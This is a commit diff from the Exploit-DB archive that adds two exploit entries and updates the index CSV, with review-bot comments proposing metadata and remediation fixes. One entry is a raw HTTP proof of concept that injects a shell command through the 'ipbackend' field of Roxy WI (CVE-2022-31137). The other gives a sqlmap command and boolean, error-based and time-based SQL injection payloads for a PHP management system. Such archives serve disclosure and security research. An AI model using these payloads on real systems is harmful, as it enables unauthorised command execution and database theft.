From 2b62bd319d40af12a8ce585dc9a423dc97ccea17 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Thu, 25 May 2023 00:16:26 +0000 Subject: [PATCH] DB: 2023-05-25 3 changes to exploits/shellcodes/ghdb Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute Service Provider Management System v1.0 - SQL Injection WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE Roxy WI v6.1.0.0 - Improper Authentication Control --- exploits/php/webapps/51481.txt | 24 +++++++++++++++++ exploits/php/webapps/51482.txt | 48 ++++++++++++++++++++++++++++++++++ files_exploits.csv | 6 +++-- 3 files changed, 76 insertions(+), 2 deletions(-) create mode 100644 exploits/php/webapps/51481.txt create mode 100644 exploits/php/webapps/51482.txt
diff --git a/exploits/php/webapps/51481.txt b/exploits/php/webapps/51481.txt
new file mode 100644
index 000000000..25c7722bd
--- /dev/null
+++ b/exploits/php/webapps/51481.txt
@@ -0,0 +1,24 @@
+# Exploit Title: Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
+# Exploit Author: Iyaad Luqman K
+# Application: Roxy WI <= v6.1.0.0
+# Vendor Homepage: https://roxy-wi.org
+# Software Link: https://github.com/hap-wi/roxy-wi.git
+# Tested on: Ubuntu 22.04
+# CVE : CVE-2022-31137
+
+
+# PoC
+POST /app/options.py HTTP/1.1
+Host: 192.168.1.44
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+X-Requested-With: XMLHttpRequest
+Content-Length: 136
+Origin: https://192.168.1.44
+Referer: https://192.168.1.44/app/login.py
+Connection: close
+
+show_versions=1&token=&alert_consumer=1&serv=127.0.0.1&getcertalert_consumer=1&serv=127.0.0.1&ipbackend=";id+##&backend_server=127.0.0.1
\ No newline at end of file
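Review bot: The new file is filed under `exploits/php/webapps/`, but the request it records targets `/app/options.py`, and the Roxy WI entries already in the index (51226, 51227, 51228) live under `exploits/python/webapps/` with platform `python`; the row added for 51481 in the files_exploits.csv hunk repeats the mismatch with `webapps,php`. Filing it as `exploits/python/webapps/51481.txt` with platform `python` would keep the product's entries together for anyone filtering the index by platform. The header also lacks the `# Date:` line that 51482.txt in this same commit carries, and it names no fixed release; a line such as `# Fixed in: <fixed version, confirm against the vendor advisory>` would let a defender tell whether an installation is exposed. For triage, the distinguishing features of the recorded request are the empty `token` field and the shell metacharacters in `ipbackend`, which one sentence of description could state so the entry is usable for log review.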
diff --git a/exploits/php/webapps/51482.txt b/exploits/php/webapps/51482.txt
new file mode 100644
index 000000000..f2e22b8c9
--- /dev/null
+++ b/exploits/php/webapps/51482.txt
@@ -0,0 +1,48 @@
+# Exploit Title: Service Provider Management System v1.0 - SQL Injection
+# Date: 2023-05-23
+# Exploit Author: Ashik Kunjumon
+# Vendor Homepage: https://www.sourcecodester.com/users/lewa
+# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
+# Version: 1.0
+# Tested on: Windows/Linux
+
+1. Description:
+
+Service Provider Management System v1.0 allows SQL Injection via ID
+parameter in /php-spms/?page=services/view&id=2
+Exploiting this issue could allow an attacker to compromise the
+application, access or modify data,
+or exploit the latest vulnerabilities in the underlying database.
+
+Endpoint: /php-spms/?page=services/view&id=2
+
+Vulnerable parameter: id (GET)
+
+2. Proof of Concept:
+----------------------
+
+Step 1 - By visiting the url:
+http://localhost/php-spms/?page=services/view&id=2 just add single quote to
+verify the SQL Injection.
+Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"
+-p id --dbms=mysql
+
+SQLMap Response:
+----------------------
+Parameter: id (GET)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw
+
+ Type: error-based
+ Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
+BY clause (FLOOR)
+ Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT
+COUNT(*),CONCAT(0x7178717171,(SELECT
+(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: page=services/view&id=1' AND (SELECT 1072 FROM
+(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 9d9bbe31f..e3801d5e7 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
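Review bot: The description in 51482.txt names the injectable parameter but gives neither the cause nor a fix, so a maintainer of the application learns only that `id` on `?page=services/view` is affected. The recorded sqlmap payloads all close a single quote before the injected condition, which suggests the value is concatenated into a quoted string in a WHERE clause; a short section such as `3. Remediation: bind id as a prepared-statement parameter and reject non-integer values before the query runs` would make the entry usable for defenders. The impact sentence ending "or exploit the latest vulnerabilities in the underlying database" is vague and would read better as the concrete impact, namely read and write access to the application's database. The header carries no CVE or vendor-fix reference; if either exists it belongs there.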
@@ -28713,6 +28713,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip,
 46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
 46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
+51481,exploits/php/webapps/51481.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute",2023-05-24,"Iyaad Luqman K",webapps,php,,2023-05-24,2023-05-24,1,CVE-2022-31137,,,,,
 50934,exploits/php/webapps/50934.txt,"Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated)",2022-05-12,"Eren Gozaydin",webapps,php,,2022-05-12,2022-05-12,0,CVE-2022-28080,,,,,
 6589,exploits/php/webapps/6589.txt,"RPG.Board 0.0.8Beta2 - 'showtopic' SQL Injection",2008-09-26,0x90,webapps,php,,2008-09-25,2016-12-23,1,OSVDB-49317;CVE-2008-4736,,,,,
 6591,exploits/php/webapps/6591.txt,"RPG.Board 0.0.8Beta2 - Insecure Cookie Handling",2008-09-27,Stack,webapps,php,,2008-09-26,,1,OSVDB-57330;CVE-2008-7028,,,,,
@@ -29122,6 +29123,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 35197,exploits/php/webapps/35197.txt,"Serenity Client Management Portal 1.0.1 - Multiple Vulnerabilities",2014-11-10,"Halil Dalabasmaz",webapps,php,,2014-11-12,2014-11-12,0,OSVDB-114661;OSVDB-114660,,,,,
 45817,exploits/php/webapps/45817.txt,"ServerZilla 1.0 - 'email' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comServerZilla_src.zip,
 10938,exploits/php/webapps/10938.txt,"Service d'upload 1.0.0 - Arbitrary File Upload",2010-01-03,indoushka,webapps,php,,2010-01-02,,0,,,,,,
+51482,exploits/php/webapps/51482.txt,"Service Provider Management System v1.0 - SQL Injection",2023-05-24,"ASHIK KUNJUMON",webapps,php,,2023-05-24,2023-05-24,0,,,,,,
 4089,exploits/php/webapps/4089.pl,"SerWeb 0.9.4 - 'load_lang.php' Remote File Inclusion",2007-06-21,Kw3[R]Ln,webapps,php,,2007-06-20,2016-10-05,1,OSVDB-36324;CVE-2007-3358,,,,http://www.exploit-db.comserweb-0.9.4.tar.gz,
 4696,exploits/php/webapps/4696.txt,"SerWeb 2.0.0 dev1 2007-02-20 - Multiple Local/Remote File Inclusion Vulnerabilities",2007-12-06,GoLd_M,webapps,php,,2007-12-05,,1,OSVDB-39220;CVE-2007-6290;OSVDB-39219;CVE-2007-6289;OSVDB-39218;OSVDB-39217,,,,,
 9284,exploits/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,webapps,php,,2009-07-26,,1,,,,,,
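Review bot: The author field of the added 51482 row is written `"ASHIK KUNJUMON"`, while the header of 51482.txt added in this same commit spells it `Ashik Kunjumon`. Using `"Ashik Kunjumon"` in the row keeps a case-sensitive author search of the index in step with the file. The codes column is empty; if a CVE id has been assigned for this issue it should be recorded there, so that scanners keyed on CVE can match the entry.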
@@ -33719,7 +33721,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49989,exploits/php/webapps/49989.py,"WoWonder Social Network Platform 3.1 - Authentication Bypass",2021-06-11,securityforeveryone.com,webapps,php,,2021-06-11,2021-06-11,0,,,,,,
 51122,exploits/php/webapps/51122.py,"WP All Import v3.6.7 - Remote Code Execution (RCE) (Authenticated)",2023-03-29,AkuCyberSec,webapps,php,,2023-03-29,2023-03-29,0,CVE-2022-1565,,,,,
 47419,exploits/php/webapps/47419.txt,"WP Server Log Viewer 1.0 - 'logfile' Persistent Cross-Site Scripting",2019-09-25,strider,webapps,php,,2019-09-25,2019-09-25,0,,,,,,
-51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-04-03,0,CVE-2020-25213,,,,,
+51224,exploits/php/webapps/51224.py,"WP-file-manager v6.9 - Unauthenticated Arbitrary File Upload leading to RCE",2023-04-03,BLY,webapps,php,,2023-04-03,2023-05-24,1,CVE-2020-25213,,,,,
 51152,exploits/php/webapps/51152.txt,"WPForms 1.7.8 - Cross-Site Scripting (XSS)",2023-03-30,"Milad karimi",webapps,php,,2023-03-30,2023-03-30,0,,,,,,
 39678,exploits/php/webapps/39678.txt,"WPN-XM Serverstack 0.8.6 - Cross-Site Request Forgery",2016-04-11,hyp3rlinx,webapps,php,80,2016-04-11,2016-04-11,0,,,,,,http://hyp3rlinx.altervista.org/advisories/WPNXM-CSRF.txt
 51075,exploits/php/webapps/51075.txt,"WPN-XM Serverstack for Windows 0.8.6 - Multiple Vulnerabilities",2023-03-27,"Rafael Pedrero",webapps,php,,2023-03-27,2023-03-27,0,,,,,,
@@ -34487,7 +34489,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 38738,exploits/python/webapps/38738.txt,"Plone - 'in_portal.py' < 4.1.3 Session Hijacking",2013-07-31,"Cyrill Bannwart",webapps,python,,2013-07-31,2015-11-17,1,CVE-2013-4200;OSVDB-95863,,,,,https://www.securityfocus.com/bid/61964/info
 49930,exploits/python/webapps/49930.txt,"Products.PluggableAuthService 2.6.0 - Open Redirect",2021-06-02,"Piyush Patil",webapps,python,,2021-06-02,2021-06-02,0,CVE-2021-21337,,,,http://www.exploit-db.comProducts.PluggableAuthService-2.6.0.zip,
 39199,exploits/python/webapps/39199.html,"Pyplate - 'addScript.py' Cross-Site Request Forgery",2014-05-23,"Henri Salo",webapps,python,,2014-05-23,2016-01-08,1,CVE-2014-3854;OSVDB-107099,,,,,https://www.securityfocus.com/bid/67610/info
-51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31125,,,,,
+51226,exploits/python/webapps/51226.txt,"Roxy WI v6.1.0.0 - Improper Authentication Control",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-05-24,1,CVE-2022-31125,,,,,
 51227,exploits/python/webapps/51227.txt,"Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31126,,,,,
 51228,exploits/python/webapps/51228.txt,"Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload",2023-04-03,"Nuri Çilengir",webapps,python,,2023-04-03,2023-04-03,0,CVE-2022-31161,,,,,
 50318,exploits/python/webapps/50318.py,"Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)",2021-09-22,"Mohin Paramasivam",webapps,python,,2021-09-22,2021-09-22,0,,,,,,